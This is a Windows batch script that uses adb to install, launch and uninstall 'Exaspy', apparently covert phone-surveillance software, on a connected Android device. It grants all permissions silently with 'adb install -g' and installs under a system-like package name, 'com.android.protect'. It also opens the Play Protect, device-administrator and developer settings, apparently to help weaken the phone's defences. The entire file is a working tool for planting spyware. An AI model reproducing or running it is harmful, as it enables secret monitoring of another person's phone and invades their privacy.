@echo off
color f1
echo(
echo *********************************
echo *                               *
echo *   Please make sure:           *
echo *   1. USB debug is enabled.    *
echo *   2. Drivers are installed.   *
echo *   3. Device is connected.     *
echo *                               *
echo *********************************
echo(
echo(
echo Starting adb server..
adb kill-server>nul
adb start-server>nul
echo(
echo Please allow usb debugging on the device to continue.
echo(
echo Waiting for device..
adb wait-for-device
echo(

for /f "delims=" %%a in ('adb shell getprop ro.product.manufacturer') do @set manu=%%a
for /f "delims=" %%a in ('adb shell getprop ro.product.model') do @set mode=%%a
for /f "delims=" %%a in ('adb shell getprop ro.build.version.release') do @set vers=%%a

echo Device detected!
echo(
echo **********************
echo %manu%, %mode%
echo Android version %vers%
echo **********************
echo(

echo 1 - Install 0.9996 version - root/system
echo 2 - Install 1.046 version - root/accessibility
echo 3 - Uninstall Exaspy (no device administrators and system)
echo 4 - Lunch Exaspy
echo 5 - Lunch Supersu
echo 6 - Lunch Google Play Protect
echo 7 - Lunch Device Administrators
echo 8 - Lunch Development Settings
echo 9 - Exit
:selec
echo(
SET /P M=Type your choice and press ENTER:
IF %M%==1 GOTO ver09996
IF %M%==2 GOTO ver1046
IF %M%==3 GOTO uninst
IF %M%==4 GOTO exa
IF %M%==5 GOTO super
IF %M%==6 GOTO gpp
IF %M%==7 GOTO da
IF %M%==8 GOTO ds
IF %M%==9 GOTO EOF
:ver09996
SET firstVersionChar=%vers%
SET firstVersionChar=%firstVersionChar:~0,1%
if %firstVersionChar%==2 goto oldVersion
if %firstVersionChar%==3 goto oldVersion
if %firstVersionChar%==4 goto oldVersion
echo Installing Exaspy version 0.9996
for /f "delims=" %%a in ('adb shell echo $EXTERNAL_STORAGE') do @set sdpath=%%a
adb push 0.9996/a.apk %sdpath%/Download/a.apk > nul
if %firstVersionChar%==5 (
  adb install -r 0.9996/a.apk
  ) else (
  adb install -r -g 0.9996/a.apk
  )
echo(
echo Lunching the app on the device
adb shell am start -n com.android.protect/.ui.login.LoginActivity > nul
echo(
echo *********************************
echo *                               *
echo * Version 0.9996 was installed  *
echo *                               *
echo *      Please continue the      *
echo *                               *
echo *  installation on the device.  *
echo *                               *
echo *********************************
echo(
GOTO selec
:ver1046
SET firstVersionChar=%vers%
SET firstVersionChar=%firstVersionChar:~0,1%
if %firstVersionChar%==2 goto oldVersion
if %firstVersionChar%==3 goto oldVersion
if %firstVersionChar%==4 goto oldVersion
echo Installing Exaspy version 1.046
for /f "delims=" %%a in ('adb shell echo $EXTERNAL_STORAGE') do @set sdpath=%%a
adb push 1.046/a.apk %sdpath%/Download/a.apk > nul
if %firstVersionChar%==5 (
  adb install -r 1.046/a.apk
  ) else (
  adb install -r -g 1.046/a.apk
  )
echo(
echo Lunching the app on the device
adb shell am start -n com.android.protect/.ui.login.LoginActivity > nul
echo(
echo *********************************
echo *                               *
echo *  Version 1.046 was installed  *
echo *                               *
echo *      Please continue the      *
echo *                               *
echo *  installation on the device.  *
echo *                               *
echo *********************************
echo(
GOTO selec
:oldVersion
echo(
echo ********************************************
echo *                                          *
echo * Sorry, Android version must be 5 and up! *
echo *                                          *
echo ********************************************
echo(
GOTO selec
:uninst
echo(
echo Uninstalling Exaspy
adb uninstall com.android.protect 
echo(
GOTO selec
:exa
echo(
echo Lunching the app on the device
adb shell am start -n com.android.protect/.ui.login.LoginActivity > nul
echo(
GOTO selec
:super
echo(
echo Lunching the app on the device
adb shell am start -n eu.chainfire.supersu/.MainActivity > nul
echo(
GOTO selec
:gpp
echo(
echo Lunching Google Play Protect
adb shell am start -S "'com.google.android.gms/.security.settings.VerifyAppsSettingsActivity'" > nul
echo(
GOTO selec
:da
echo(
echo Lunching Device Administrators
adb shell am start -S "'com.android.settings/.Settings$DeviceAdminSettingsActivity'" > nul
echo(
GOTO selec
:ds
echo(
echo Lunching Development Settings
adb shell am start -S "'com.android.settings/.Settings$DevelopmentSettingsActivity'" > nul
echo(
GOTO selec
:EOF
timeout /t 2 > nul